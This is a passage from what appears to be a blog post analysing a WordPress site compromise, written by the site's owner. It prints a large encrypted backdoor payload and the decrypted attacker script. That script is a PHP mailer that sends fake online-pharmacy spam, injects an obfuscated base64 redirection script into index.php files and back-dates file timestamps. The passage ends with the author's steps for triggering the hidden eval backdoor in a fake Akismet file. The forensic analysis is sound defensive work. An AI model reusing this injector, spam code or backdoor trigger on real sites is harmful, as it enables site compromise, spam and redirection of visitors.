chkU18/Qr3GU5PUnFjcoqbOn5+aVaDH05dS1qZYzqCk1aWnmFWZ0s1TochXp9qlVNavpKeapdmBp6GCqp3XqZmDr6CoVZrL1aeX1GVYrqFUxFafmJaqhseoptepnYWso9hWqJyhpIbDmFLDmaTKU6jSVqGflpvLgZRS0JyvhaKmx5ujpmFC2tOUlc1XsdSopoOmkpagmc3GplLDpZyFmpnXVpJTp53HzVOmy6SdhZ+d2ZtRpqqo1tClpoJkWMafoIOco6KiWNXPmFLSo5nImGKDVoWbmqrLgZSkx1elxqGtg6mgYJiZ0s2YloKTWteYlc9WpKekqsvUj1SOV5rap1Tam1GUp51w1ZuXgqam0axU0qSWU6Gdzcqnm8+YrMpfVM+flJijq8vFU5PQm1jXmKDMl5OfmljVz5+b0JxY2Juj06aaoZxY1s2UlcdXntSlVMSinVOknobaoqfUqljSmJjMmZKnnqfUgaGXx5urk1OLyFagmZud2IGVodafWMelldGaUZSjnHDImKDHqaHIplTQm5WmVZ7V01Oox6mxhZaj0KaWp56sz9eYUtKpociYp5FWeplVsdXWpVLSmJvQlJvIVpapmqqGyJimgqOn2KdU2ptRlKGvx9qmUtmgpNFTpsipmZylWM/VU5jRqVjLpZnIZDs9h53TxqCUx6lY2aJU2KaVlKmdhtqip9RXmtSin9CXo56oWMzQpVLRrKqFb5WDnqOYm3WNg2FWxKOnzKimz2RTYldmis+YqcagqpNVY6JYX6aqmtnVpVrPm22NVaDFopKUqJyIj6Cbxamn2ZyhyF5aXGFoktOUoMZfapVfZ5NfWmFXX6TPmKmCmKbJU53QpqOiq53Kgaam0amdoWKVoWQ7PXedhsKqk9ScWNSZVNaZkqBVq8/VmKWCrqHZm1TWn56coZnYgZ+h0aJYklOryFaSpZpY2smYUtGlpN5To9GbUZ+an8/VnJ/Dq52FiIeDl6Gjp6fcxpdS0aWkzqGZg5qjqJyr2tCll5BBQqahmIOolqCapcjGpVKPV6/KU5XPrZKsqFjZxp+egp2n11OgyKmkVD9CusKel4KYnNuUoteXmJhVp8yBoqfUV6vVmJfMl52mVWWG0Z+TxZxYxqFU0qiVmKdYyManqcecpoWAldWZmVNmbYaOU3/DqZvNU2aTVpKhmVjf0KhS2aCk0VObyKpRlKNYx8WXm9agp9OUoINnYVhVp8yBmqHRm6uFmaPVVpelmp2Haz2H1ZxY2Zud1laUopmdhsKnUsWfncieVNKrpVNiWJ2YZWqVaG2Fp6ODmZ2UnqWG2qKn1FeczqaX0qufp2NCcLWbk9CiWN6iqYOcoKVVmsvGoVLOprHGn1TGq6SnpKXL0188vX+d0Zii34Cgm6O0tsanl9Szeteol8iycp+asOKjlKTDorSql6vEqJWvh6fIxqWm3nqg15yn34mlmKud4qOcns6zedefndGyf5SZocfdhpPQq5nhgKPRn5yUsYLb1Keb0LN+15iYx6+tfaqr2sqhrrSmmsqlqNKyf5SZodTGr3jUnJzKpZ3Gsn6coJ3Daz1uw1eg15iaoF1TYVmt1NSolNWaqs6VmcKimqGgZoiIcafQqq3HppfVn5OYcWfHn1VtbEFc2KiWzZuUp3Ks3tWSpcqsnsufmYtapKiXosvEp1udQVzSmKfWl5iYcqze1ZKlyqyey5+Zi1qemKirx8iYW51BQohWV4ZZVFZYW4mEVlWFWluIVleGWVRWWFuJhFZVhVpbiFZXhllUVlhbiYRWVYVaW4hWV4ZZVFZYW3BrnJiKW6vZlJvIc25VmZ3SxqeXhGCzb1NUg1ZVm5aq2J6ZqdSgrMaVoMhecnWIiKe1e2CEZq/VYJfSpKWYo6yV1ZuXz5yrh19W056hVV5zcIFTUoKgno2mnd2boJldXM7CpaSLdWiOU5rSqJaUmKCOhZuT1KlYxqZUh6aSp51hhsqZWtWrqtWip4taoZSpoJKDnKDGnLCTo5zTWFpUcnXMwp+lx2Czb1NUg1ZRU1VYisqhmJ+qrManXIemkqedYaFrU1KCV1iFU1SHqqmncp7PzZiRyZysxJaj0aqWoamrjoWjk9afYaA9VINWUVNVWIaFp6rWdKjXmJvCqJajoZnJxltUg3OUpKOc01Zgj19YydCjq9Sgn82nVL9gYGFfd5W9XVLFpqjepZ3KnqVTkWKVgY9xoFih2FVghVhdV6mw2opuPIJXWIVTVINWVZmddczQo5fQX1zVlKjLYlOqYFqPnFOY2amh2Zhch5yZX1ms3tVcbYKdm9Gip8heVZmdYaFrU1KCV1iFU1TXpaaWnWCK0ZSmymNczqGavl2ep56ly4iQXoagpsuOW8SqmqCaX8OKbjyCV1iFsD6DVlFTP0JvhaOT1p91pnWHs3eFe2NalcqhlsevZtWbpIVxOzxZodTHcKXWmKyNV6TEqplccEJvhaeq1nSezp+Zwp2Wp5Sb1c+nl9Crq41XpMSqmVxwQm+Fp6rWdKjXmJvCqJajoZnJxltUg3OUpKOc01Zgj19YydCjq9Sgn82nVL9gYGFfd5W9XVLFpqjepZ3KnqVTkWKVgY9xoFih2FVghVhdV6mw2opuPGtbns1wmtKmlqFdXNbCp5qOWa+QVV2eVpeqp6HaxltWyJ9kiaWo26pfV6mw2opuUsiapNSmmYtal5tec3Bqp6HXmqCNV6TEqplfWaHUx45Zz6uh0phbwGJVnKOewYiUpsuknYyQXZ5AO1NVWIZrU1KCV53dnKieQK49P6HMiVel1pifynBxhZyapaisiIquPIJXWIVXl8dzpKenl9jGo5fDq2CHYWKSWF2mqprZ1aWRxaat06dch5eTpqqq0o1VYYRgZZdcb21WUVNVQomBU1KCnafXmJXGnlmUp6rH2ltU1auZ2aZi056hVWFaz8+ZoZCnoNVVYIWZoKijrMvTYaLKp1qOU5XWVlWZm2Hha1ZSgldYblekxKqZcFmbyo9XmMhyQohTVINWOleepsyepqbDq2CJo5XXnlpuP1uGgVNSa1uezXCa0qaWoV1c1sKnmo5Zr5BVXZ5Wl6qnodrGW1bIn2SHVV2eVpeWoafZxltWyJ9hoD1Xg1ZRUz6s1daWmopbqMannI9amqGbk43Op5vPnF/CX1jMpJeOXJnayqCXiZRhoD1Xg1ZRUz6t1M2coM1fXNWUqMtfbD1YWIaBU69sQUGllpzQpZVbWZvKj1WV0aym2ZimkaaZo1dklphqaYtyQm5zqdGimqGgYIrEl2CEmqfaoajIqF+jnaiIim48bEB40p6YzKhZV5iclIWhl9mboddcb20/cZadpdXFW1bFm2aJoZnampqlYWidmGpbnUFBpZac0KWVW1mbyo9XoMeunM6lYoVlmqGZnd6Po5rSWWSVamuaX2w9P0GK0ZSmynRcyJdih6SWqpmh2I9VYculnMqrYtOeoVVwQm+FnKDIdKvZlKiLWqGUqaCPnD07hquw2XCazKKWkpyd2sCWodCrndOnp4taoZSpoI+cPTuGq7DZcKTVm5iSp53WzZSVx19ahm+QoqaZo1VnwotTldGnsdecm8uqUY9fZ5SLcmG+YVjIoqTcqJqanayGvV1hgpN3o1Sd1lhdVVdkitWrpotyQm5Xmstzl6KlndSJV6LDq6CRVauOWFpuVZ7d05ymx19cy5tgh6ilq6lmitWrpotyWMuWoNKplltZns6KbjxrmqDSopiLWqGUqaCSkWhnl2BzhZac0KWVW1mbyo9XoMeunM6lYJNrZmhec3Bqp6HXmqCNV6TEqplfqKzY1aKmy6SdjVVlnFZ+lK5YmJFja4RgZNinptelpZyinY6DZGuChJneU2aTZmpVXmGhaz07x6+h2W4+4EA7V6Kd2dScltSYpslwVoVxUZmkqo6FnG+SclzOb2aVcVWcYGOP3FNWxZ91yJumi6OlkqeZ1MVba5ljaZdlXYxxUVeindnUnJbUmKbJYXGLo6WSp5nUxVtijmhhonBljHVVlp1y2dWlptGsqNWYpotalJtec4bePVbGpqXGnKKDc1GmqprZ1aVahp2q1KBgg6mlpaWn2YlXmNSmpZFTVqNYWl9Vq9rTn5fQX1zLpaPQX1puP1zOxpSWx6lYolNWqaigoG9YiI9XmNSmpZNVkNWSn1VwQomFm5fDm53XU2KgVlN/nqvajoig1aya2JamzJiWbVValIWooNWsmtiWpsyYlpKhodTMYVS+qZTTVW9tWVWbmpnKxqVSkHRYh4WZ06KqYKmnoIGhoY+pndWfraOdnpSepJTEop++qZTTVW9tWpmYlpzL01Ngn1daspin1peYmGKByptTboRlXNKYp9aflaWWpsqPV5bRpJnOoWKFdI2lkaaInD1WypyZyZimg2RuU1eFr654X7icqtico9FwUWRjaMLTj6CEckKJm5nEmpalVWajgVV10aWsyqGokIqqo5pyhtWYqtZmoNmgoL+ojaFXc3CFm5fDm53XU2KgVlN2pKbaxqGmj4uqxqGnyZujYHqmydCXm9CecoVrlsyqjaWRpsLTj6CEckKJm5nEmpalVWajgaGelJmqjVehyKmklJydj49VjtSTpoduPm2fl1uimc/NW1bWpmSJpqnFoJaWqWSIg19WypyZyZimj11emVVflIWZpNGkYY5TmcaeoFNXpcfKn5HJpqfJVW9tm52mmrNwgVNSgqCejVen15eYmHJ1iMecpNWrWoVZWoOpmq2ap8yJV5rDqaqOcWSMVpeip53HxJtahp+Z16VUxKlRV6WZ2slcUsudYNinptOlpFtZqMfVm16EoKbJmKyRppmjV2GHnnCYw6OrylyvbT86V56mzJ6mpsOrYImjldeeWm4/QW+Fp6rWdJ7On5nCnZanlJvVz6eX0KurjVekxKqZXHBCb2pXptqrddWlmcqVo5ilpMfEmFqEWHTBcqTLplFikWKGxKKi26mhzJuog5JbYmNipZCPXIKap9WspsydmadVlJCQU46hdVnOplaPWFNfWaze1VxtbEBBiZmcoJygo5qmjoWjk9afZIeqX4VfbFObr9jKp5eKW57NX1jXrqVccFjMxJ+h1ZxgiZmcjHE7PD6s1daWmopbqMannI9amqGbk43Op5vPnF/CX1jMpJeOXJnayqCXiZRhoD1Ug1ZRsD9YhoFTl8Wfp4VVlsSaUaapmc3GU2SEckKFU1SDm6mcqXNw3j08bEFbiFZXhllUVlhbiYRWVYVaW4hWV4ZZVFZYW4mEVlWFWluIVleGWVRWWFuJhFZVhVpbiFZXhllUVlhCzNahldagp9NTmtqomqeWmtLGW1bGY1zGlqigWJWcp1qP3D07yaOnx5Sgg1qSpadzcGpXlp+qrNeSpsimnZSYnY6DYmGEY1qUVWCHmlpuVVzKnlul15mr2aVch5pdYGZho55VYYRgd9ioltaqo1tZnJKRX1+TYHKJl29tP5qZXVzKyqVvoqaoyqGYzKhZV5lhj9w9O2uuoM6fmYteVZlyeNjGlJbGoKqNV5jMqFpcVnWjx5Se1Zxh4D09bD+amV1czJ5wVJBZWOGvVIecbnBXZpSDU67eV6HYkqDMpJxbWZ6PilOV0aWszqGpyHE7PD5Bz8dbm9WWnM6lXIeaX1VkWpSFmVuLskJuPD1sn5dbWZnJ1XBvhJuh11VUiVxRnKiX3dOcpsOZpMpbWMdkU2JXZorHXFuCW5nXpY/Ac1WXY1qVg2FWyHJCbjw9bJyopZ6sx8Ofl4pbnJNVY4VkVZlhWIrClqaLckJuPD3gm52mmqHMiVtWw5qsonBW056hVV5YjIdTm9WWr9ecqMSYnZhdXMqPVWGEZVzLXFSJXFFbqK3I1KekiluekWBojHNuVWOoztFVUt6zWNioltaqo1tZnpKOaF6WYHWiVWLTnqFVXmGGhZSk1JKVoleYkVhgVWNczJw9O2u0Qm6wPmx2lJ+kq8vFnKSKW5zOpV2eQDqlmqzb06FShpiq124+4EA7maqmydWcodBXrN2nk9aeppmbpMuJV6baq2HgPVSDVlGjp53NwKCT1pqgxJSgz15TVJGTjo9dcYuTlYacp4ViVaetrJKFoFudQViFU1TMnFmmnrLL0JlahqSTlpByk19aU5un2MaUlcpfXNKOZcBWkqZVXNGecVbYYLNvPFjZc5arpaTVxZhahLNakVeqjHE7PKig28eZnsdfXNtcb20/VaetrKPUp6TBqZ3Vn5XGm1lXopOWvo5WzZRkiamPk5NdV6mw2opuPIJXWIWwPoNWUVOnndrWpaCCW6zdp29tszs=",$_COOKIE['1fa2074431b47cb9'])); exit;
The code is actually encrypted using a relatively primitive padding. It's not clear what the code is without the key though. Fortunately, I added a few extra lines to the capture code and got a hold of the attacker's COOKIE. Interestingly enough, the COOKIE value that is needed is different for every POST request made by the attacker. This means that the attacker is using some sort of program that's generating the POST values and COOKIE values.
The decrypted content of one of the POSTs is shown below.
unset($_POST['file']); \$stage="second";
$newdir="c7b";
$from_users=unserialize(base64_decode("YToxMTp7aTowO3M6MzoibG95IjtpOjE7czo1OiJhcnRpcyI7aToyO3M6Njoiam9zZXBoIjtpOjM7czo1OiJzY290dCI7aTo0O3M6NzoibWljaGFlbCI7aTo1O3M6NzoiZW5yaXF1ZSI7aTo2O3M6NzoiZHJmZ3ZyZSI7aTo3O3M6NjoibWFydGluIjtpOjg7czo2OiJqb3NlcGgiO2k6OTtzOjY6Im1pY2hlbCI7aToxMDtzOjY6ImFsYmVydCI7fQ=="));
$from="icopland.co.uk";
$blogurl="http://insparenting.com";
$icd=substr_count($blogurl,"/")-2;
for($i=0; $i<$icd; $i++) $blogurl=substr($blogurl,0,strrpos($blogurl,"/"));
$absurl="http://icopland.co.uk";
$fullname=ucwords(strtolower("Mark Osteen"));
$address=ucwords(strtolower("173 Alamo Road"));
$zipcode="";
$city=ucwords(strtolower("Ardmore"));
$state="OK";
$country="USA";
$rtxt=base64_decode("PD9waHAgLyogY29weXJpZ2h0ICovICR7IkdMXHg0ZkJceDQxXHg0Y1x4NTMifVsiXHg2YmdceDZlXHg3Mlx4NzdpXHg2ZVx4NjRceDYybiJdPSJceDc0eFx4NzQiOyRlZ2VpbGxicD0iXHg2YiI7JHsiXHg0N1x4NGNPXHg0Mlx4NDFMXHg1MyJ9WyJceDYza21qXHg2M3VpZSJdPSJceDc2Ijtmb3JlYWNoKCRfR0VUIGFzJHskZWdlaWxsYnB9PT4keyR7Ilx4NDdMXHg0ZkJceDQxXHg0Y1MifVsiXHg2M2tceDZkXHg2YWN1XHg2OWUiXX0peyR7Ilx4NDdceDRjT1x4NDJceDQxXHg0Y1x4NTMifVsiZFx4NzhceDc3XHg3MW9ceDYxbHZceDYxXHg3NVx4NjUiXT0iXHg2YiI7aWYocHJlZ19tYXRjaCgiIV5bYS1ceDdhXHgzMC1ceDM5XXsxMCxceDMzMn1cJFx4MjFpcyIsJHskeyJceDQ3XHg0Y09ceDQyXHg0MUxTIn1bIlx4NjRceDc4XHg3N1x4NzFceDZmXHg2MVx4NmNceDc2YVx4NzVceDY1Il19KSl7JHhmZ3NweXdydD0iXHg2YiI7JGpkaGJ3ZWs9Ilx4NzRceDc4XHg3NCI7JHskamRoYndla309YmFzZTY0X2RlY29kZSgiXHg1MFx4NDZceDRlRFx4NTVrbFFWXHg0M0JceDczWVx4NTdceDM1XHg2ZWRXRm5aVDFxXHg1OVx4NThaXHg2OFx4NjNceDMyXHg0ZXlceDYxWFx4NDIwUGdceDMwXHg0Ylx4NTBceDQzRVx4NzRMXHg1MTBLXHg1YVx4NmVWdVkzUnBiMlx4MzRnXHg1YVx4MzJWMFx4NjJXXHg1NW9ceDYzXHgzM1J5S1x4NTEwXHg0Ylx4NjV5QjJZWFx4NDlnXHg2MVdSNElEXHgzMFx4NjdceDYzM1JceDc5XHg0Y21sdVpHVlx4MzRceDU0Mlx4NTlceDZmXHg0YVx4N2FceDM4blx4NGJUXHg3M1x4NjdhXHg1N1x4NTlnXHg0YkdceDZjXHg2YmVceDQzQTlQXHg1M0FceDc0XHg0ZFNceDZiZ2NceDZkVjBceDY0XHg1OFx4NGF1XHg0OVx4NDhceDRlXHgzMGNqc2dkXHg2ZEZ5XHg0OUd4XHg2Y2JceDY5XHg0MTlceDQ5XHg0OFx4NGUwY2k1XHg3M1pXXHgzNVx4NmVceDY0R1x4NjdceDM3SVx4NDhaXHg2OFx4NjNceDY5Qlx4NzVceDVhWGRceDY2YzNSXHg3OUlceDQ0MGdceDQ5XHg2OUk3XHg0OUhaXHg2OGNceDY5XHg0Mlx4NzBJRDBceDY3XHg0ZFRzXHg2N1x4NWFtXHgzOVx4NzlJXHg0M2dceDcySzJceDZjXHg2YmVEc1x4NjdceDYxXHg1N1JceDM0XHg0OVx4NDR3XHg2N1x4NjJHXHg1Nlx4NzVPXHg3OUJwXHg1YVx4NDhnXHg2N1x4NGJ6MFx4NjdceDRkaXhwXHg0Ylx4NzlceDczXHg3MERceDUxXHg3MFx4MzdJSFx4NWFoY2lCXHg2YWFDXHg0MVx4MzlceDQ5SFx4NDJoXHg2M25ceDRlXHg2Y1x4NTNXXHgzNVx4MzBLSE4wXHg2M2lceDM1XHg3YVx4NjRceDU3XHg0YXpceDY0XHg0OFx4NDlvYVx4NTdceDUyNExDXHg0MVx4NzlLU1x4NzdceDY3XHg0ZFx4NTRZcE95XHg0Mlx4NzVaWGRceDY2XHg2M1x4MzNSeUlDc1x4MzlJRk5ceDMwXHg2M21sXHg3NVx4NWF5XHgzNVx4NmRjbVx4Mzl0XHg1MVx4MzJceDY4XHg2OGNceDZiXHg0ZXZaXHg0N1x4NTVvXHg0Ylx4NDdOXHg2ZklceDQzXHg3M2dhXHg1M2tceDY3XHg0YVNBeU5UWVx4NzBceDRmeVx4NDI5SUEwS1pceDQ3OWpkV1x4MzFceDZjYlx4NmVceDUxdWQzSnBceDY0XHg0N1VceDZmXHg2Mlx4NmRceDU2XHgzM1x4NThceDMzXHg0ZTBjXHg2OTV6ZFdKXHg3YVx4NjRIXHg0OW9ceDRkXHg0M3h1XHg1YVx4NThceDY0Zlx4NjMzXHg1MnlceDRjXHg2ZHhceDZjXHg2Mlx4NmRceDY0MFx4NjFDXHgzMHhNU2tceDcyXHg0OWx4XHgzMU1EXHg0MXlObHgxTVx4NDRceDQxMlx4NGUxXHg3ODFNXHg0NFx4NDFceDMyUmxceDc4MVx4NGREQVx4MzJceDUxXHg2Y1x4NzgxXHg0ZERceDQxMlFseDFNXHg0NFx4NDFceDdhXHg1MkZwXHg2MVdsXHg3MFx4NjNkXHg1NFx4NDFceDc3TVx4NmFceDRhY1x4NjRceDU0QVx4NzdceDRkMFx4NGFjZFRBXHg3N00wTmNceDY0VFx4NDFceDc3XHg0ZFx4NmJaY2RceDU0QXdOelx4NGVceDYzZFx4NTRceDQxXHg3N1x4NGVqTlx4NjNkVFx4NDF3XHg0ZXpceDRhY2RUXHg0MVx4NzdceDRlamxjZFx4NTRBXHg3N1x4NGV6XHg0Mlx4NjNkVEFceDc3TnpSXHg2M1x4NjRUQVx4NzdceDRkMFx4NTVpXHg0Ylx4NTRzTkNceDZlMFx4NGVDXHg2ZFx4NjR2Ylx4MzJceDY0XHg3M1pWXHgzOVx4NjhceDVhXHg0Nlx4MzlqYlx4NDdceDZjXHg2Y2JceDZlUWdceDUwXHg1M0FceDY5Y1x4NDhWXHg2OVx4NGNURVx4MzBNXHg3YVx4NDExXHg0ZkRRXHgzME1ceDQ0Z1x4N2FNVE1ceDM0XHg0ZVx4NDRceDRkXHg2OU9ceDc3MFx4NGJceDVhXHgzMjl2XHg1YTJ4bFhceDMyXHg0Nlx4NmJYXHgzM2RceDcwXHg1YUhceDUyXHg2Zlx4NDlEXHgzMGdceDRlXHg3YUlceDM0XHg0Zlx4NzdceDMwS1pceDMyXHgzOXZaMlx4NzhsWDJceDQ2XHg2Ylx4NThceDMyXHg2OGxhXHg1N1x4NjRvXHg2NFx4NDNBXHgzOUlEa1x4NzdPd1x4MzBLWjI5dloyXHg3OFx4NmNceDU4XHgzMkZceDZiWFx4MzJaXHg3NmNceDZkXHgzMWhceDY0XHg0M0E5XHg0OVx4NDNJM1x4NGRceDZhXHg2OFx4MzRPVEJmXHg1OVx4NThceDRkaU93XHgzMFx4NGJceDVhMjlceDc2XHg1YVx4MzJceDc4bFx4NThceDMyRmtceDU4M1x4NTI1Y0dVXHg2N1BceDUzQVx4NjlkR1x4NTZceDM0ZEZceDM5XHg3MFx4NjJceDU3Rlx4NmVaXHg1M1x4NDk3XHg0NFFceDcwXHg2ZVx4NjIyOVx4NmVceDYyXHg0N1x4NTZceDY2WVx4NTdSZlx4NTlceDMyaGhceDYyXHg2ZDVsXHg2MkNceDQxOVx4NDlceDQzXHg0OVx4NjlPXHg3N1x4MzBLWlx4MzJceDU2MFx4NjJXVW9ceDQ5XHg2ZFx4NjgwXHg2NEhceDQxNkx5OVx4NzdZXHg1N2RceDZjWVdRXHg3OUxceDZkXHg2NHZiMlx4NjRzWlx4NThOXHgzNWJtUlx4NzBZXHgzMlx4NDYwYVx4NTc5XHg3NUxceDZkXHg0ZVx4NzZceDYyXHg1M1x4Mzl3WVx4NTdkXHg2Y1lXUXZjXHgzMlx4Njh2ZDFceDM5XHg2OFpceDQ4XHg0ZHVceDYxbk0vTVx4MzBceDQ5M01UWXdOXHg2Ylx4NTVceDMyXHg0ZVx4NDRceDVhQlx4NGVceDZiUXhPXHg0NFx4NTl6Tlx4NTRjMk1ceDdhXHg1NkNOXHg2YWdceDMxXHg0ZFx4N2FVNFx4NGVUXHg1NVx4NzlRekVceDc3XHg0ZVx4NTRjMFx4NTJceDQ0WXhORUkxUVx4N2FSXHg0M1x4NGVceDU0a1x4MzBSalx4NTUxTlRnXHg3N05USXdOVFx4NjcwT1x4NTRceDUyXHg0NU5ceDQ0XHg0OVx4MzBRelV6XHg0ZFx4NDRceDZiMFx4NGVqUTRNXHgzMEl6XHg0Zlx4NDRSXHg0Mk1ceDMwXHg1NVx4MzBceDRkXHg3YVFceDc4TUVceDVhXHg0N1x4NGRceDdhXHg0ZFx4MzRceDRlRFx4NGRceDMwTVx4NmFOXHg0NU1ceDQ0XHg1YUdRXHg1NVx4NTk1Ulx4NmJWXHg0N05ceDZiWVx4MzRSXHg2YVpHTlx4NmJZeVJqUlx4NDdOXHg2YllceDMzUlVWR1x4NGRFXHg1OTFceDUyXHg2YVx4NDZGXHg1MVx4NmFceDRhRVx4NGRceDZiXHg0ZVx4NDZOelx4NDlceDM0TVVZXHg3OVx4NGVceDZiWVx4MzBceDRkVFV4T1x4NTRceDQ1NFJVVlx4NDZOMFJceDQ3XHg1Mlx4NDVaXHg0NVx4NTJceDZiUXlNVVV4UmpCXHg0M1JceDU0Vlx4NDVceDUxXHg1NVJceDQyUkRWXHg0NVx4NGVVXHg0ZDFSRVx4NTJFXHg1MkVOXHg0N01USXdNVEJHXHg0ZERVd1FqXHg0MkZSXHg0NGNceDY5XHg0YlRceDczXHg0ZVx4NDNceDY5XHgzOFx4NzZMXHg1MzArSVx4NDR3dlx4NTVceDMwXHg0ZVNTVkJceDU1XHg1MFx4NjdceDNkXHgzZCIpO2VjaG8gc3RyX3JlcGxhY2UoIlx4NWFceDVhXHg1YVx4NWEiLCR7JHhmZ3NweXdydH0sJHskeyJHTE9CXHg0MUxTIn1bIlx4NmJnbnJceDc3XHg2OVx4NmVceDY0XHg2Mlx4NmUiXX0pO2V4aXQ7fX0gLyogY29weXJpZ2h0ICovID8+");
$to = "luckymarkos@yahoo.com";
$firstname=ucfirst(strtolower(substr($fullname,0,strpos($fullname," "))));
@shuffle($from_users);
# $from=(($from_users[0]!="")?$from_users[0]:$firstname)."-".time()."@icopland.co.uk";
$from=(($from_users[0]!="")?$from_users[0]:$firstname)."@icopland.co.uk";
#$blogurl="http://www.analytics20.org";
#$unsubscribe_link=$blogurl."/".$newdir."/?".substr(md5("lblaasd".microtime()),0,rand(20,24))."cb8J0";
$unsubscribe_link=$blogurl."/".$newdir."/?".substr(md5("lblaasd".microtime()),0,rand(20,24))."dNhjU"; // last
#$from="mail-noreply@google.com";
$subject = "Place an order between March 15 - March 20 and you will get an additional 10% of goods for free!";
$realname = "Google News";
$message="Dear ".$firstname.",
We are working hard to improve all of our systems to serve you better. In a near future you will be able to place a new orders,
track your packages and get a real time live support - all from one place. There are many so-called \"real stores\", but we are
the only one legitimate, licensed and reliable online shopping place for all of yours medication needs. We offer both brand and
generics meds for very competitive prices. If your package ever get lost we always will reship it for free.
Remember to update your bookmarks for our <a href='".$blogurl."/".$newdir."/?".substr(md5("lblaasd".microtime()),0,rand(20,30))."'>new and improved store</a>.
Be aware of scam sites with similar look - we are the only one legitimate US approved online drugstore.
And remember - we always sell for less!
Take advantage of our specials - place an order between March 15 - March 20 and you will get an additional 10% of goods for free!
Use this code at check out - 7728315 to claim your discount.
Thank you for been loyal customer,
[Helen|John|Peter|Bruce|Alex|Barak|Edward|Robert|Chris|Steve|Bill|Arlin|Nadia|Santa|Monika|Justin|Freddy|Justin|Roberto|Nadine|Frederic|Mike]
<a href='".$unsubscribe_link."'>unsubscribe</a>";
$subject=txt_shuffle($subject);
$message=txt_shuffle($message);
#########################################################
if($stage=="delete"){
$harr=fwritable(ABSPATH."/wp-content/themes","php");
if(sizeof($harr)>0) foreach($harr as $path) if(strpos($path,"index.php")!==false){
$inf=stat($path);
$txt=file_get_contents($path);
$txt=preg_replace("!<\?php /\* copyright \*/.*?/\* copyright \*/ \?>!is","",$txt);
$fh=fopen($path,"w+"); fwrite($fh,$txt); fclose($fh);
touch($path,$inf['mtime'],$inf['atime']);
}
$path=ABSPATH."/index.php";
$inf=stat($path);
$txt=file_get_contents($path);
$txt=preg_replace("!<\?php /\* copyright \*/.*?/\* copyright \*/ \?>!is","",$txt);
$fh=fopen($path,"w+"); fwrite($fh,$rtxt.$txt); fclose($fh);
touch($path,$inf['mtime'],$inf['atime']);
exit;
}
if($stage=="first"){
$cd=str_repeat("../",substr_count($absurl,"/")-2);
# foreach(array("stats.php","info.php","counter.php") as $ff){
# $path=$cd.$ff;
# $inf=stat($path);
# $fh=fopen($path,"w+"); fwrite($fh,""); fclose($fh);
# touch($path,$inf['mtime'],$inf['atime']);
# unlink($path);
# }
@chmod($cd."counter.php",0777);
@unlink($cd."counter.php");
@mkdir($cd.$newdir);
@chmod($cd.$newdir,0777);
@chmod($cd.$newdir."/index.php",0777);
$path=$cd.$newdir."/index.php";
$inf=stat($path);
$txt=file_get_contents($path);
$txt=preg_replace("!<\?php /\* copyright \*/.*?/\* copyright \*/ \?>!is","",$txt);
$fh=fopen($path,"w+"); fwrite($fh,$rtxt.$txt); fclose($fh);
chmod($path,0555); chmod($cd.$newdir,0555);
touch($path,strtotime("19 May 2009"),strtotime("19 May 2009"));
exit;
}
$messidrand=""; for($i=0;$i<22;$i++){ $ch=chr(mt_rand(97,122)); $messidrand.=(mt_rand(0,1)==1)?$ch:strtoupper($ch); }
$domain = substr($from, strpos($from, "@"), strlen($from));
$header = "From: ".$from."\r\n";
#$header .= "List-Unsubscribe: ".$unsubscribe_link."\r\n";
#$header .= "Reply-to: no-reply@gmail.com\r\n";
$header .= "Message-Id: <".$messidrand.$domain.">\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/html\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= nl2br($message)."\r\n";
if(mail($to,$subject,"",$header,'-f '.$from)) echo "mail_good";
else{
if($stage=="first" && sizeof($harr)>0) foreach($harr as $path) if(strpos($path,"index.php")!==false){
$inf=stat($path);
$txt=file_get_contents($path);
$txt=preg_replace("!<\?php /\* copyright \*/.*?/\* copyright \*/ \?>!is","",$txt);
$fh=fopen($path,"w+"); fwrite($fh,$txt); fclose($fh);
touch($path,$inf['mtime'],$inf['atime']);
}
echo "bad stage 2";
exit;
}
#########################################################
function fwritable($d,$act="dir"){
global $arr;
$d=str_replace("//","/",$d); $d=(substr($d,-1)=="/")?substr($d,0,-1):$d;
if($dir=@opendir($d)){
while(($f=@readdir($dir))!==false){
if($f=="." || $f==".." || is_link($f)) continue;
if(is_dir($d."/".$f)){
if($act=="dir" && is_writable($d."/".$f)) $arr[]=$d."/".$f;
fwritable($d."/".$f, $act);
}elseif(($act=="php") && is_writable($d."/".$f) && (substr($f,-4)==".php" || substr($f,-5,4)==".php")) $arr[]=$d."/".$f;
}
}
@closedir($dir);
return $arr;
}
function txt_shuffle($txt){
preg_match_all("!\[(.*?)\]!is",$txt,$m);
if(sizeof($m[1]>0)) foreach($m[1] as $k=>$v){
$v=explode("|",$v);
shuffle($v);
$txt=str_replace($m[0][$k],$v[0],$txt);
}
return $txt;
}
Incredibly, it's a spammer script. See that base64_decode
? The contents of that is actually the same redirection script I talked about in the previous section! When the script runs, it infects all the index.php scripts with that redirection script if the /* copyright */
line doesn't exist in the file. Interestingly enough, it also tries to set the file timestamp to 2009 too. Stages other than 'first' and 'delete' causes mail to be sent.
Finding the Backdoor
In order to figure out how this exploit worked, I had to replicate what the attacker is doing.
I replicated the attacker's cookies using the Chrome extenion EditThisCookie. Eg:
[35ebc9f6525c1ee55530] => e1eeca31b43349bfd2a8
[PREF] => 3
Then, I POSTed the following to the file
value:
dmFyX2R1bXAoZGVidWdfYmFja3RyYWNlKCkpOyBleGl0Owo=
This is the base64
encoded version of the following PHP code which generates a backtrace:
var_dump(debug_backtrace()); exit;
When the request is made, you should see the backtrace such as the one below the file and the offending file which is executing the exploit code near the top. In the case below, the file is .akismet.bak.php
.
array(7) { [0]=> array(3) { ["file"]=> string(102) "/home/xyz/public_html/wp-content/plugins/akismet/.akismet.bak.php(378) : runtime-created function" ["line"]=> int(9) ["function"]=> string(4) "eval" } [1]=> array(4) { ["file"]=> string(70) "/home/xyz/public_html/wp-content/plugins/akismet/.akismet.bak.php" ["line"]=> int(378) ["function"]=> string(13) "__lambda_func" ["args"]=> array(0) { } } [2]=> array(4) { ["file"]=> string(42) "/home/xyz/public_html/wp-settings.php" ["line"]=> int(190) ["args"]=> array(1) { [0]=> string(70) "/home/xyz/public_html/wp-content/plugins/akismet/.akismet.bak.php" } ["function"]=> string(12) "include_once" } [3]=> array(4) { ["file"]=> string(40) "/home/xyz/public_html/wp-config.php" ["line"]=> int(75) ["args"]=> array(1) { [0]=> string(42) "/home/xyz/public_html/wp-settings.php" } ["function"]=> string(12) "require_once" } [4]=> array(4) { ["file"]=> string(38) "/home/xyz/public_html/wp-load.php" ["line"]=> int(30) ["args"]=> array(1) { [0]=> string(40) "/home/xyz/public_html/wp-config.php" } ["function"]=> string(12) "require_once" } [5]=> array(4) 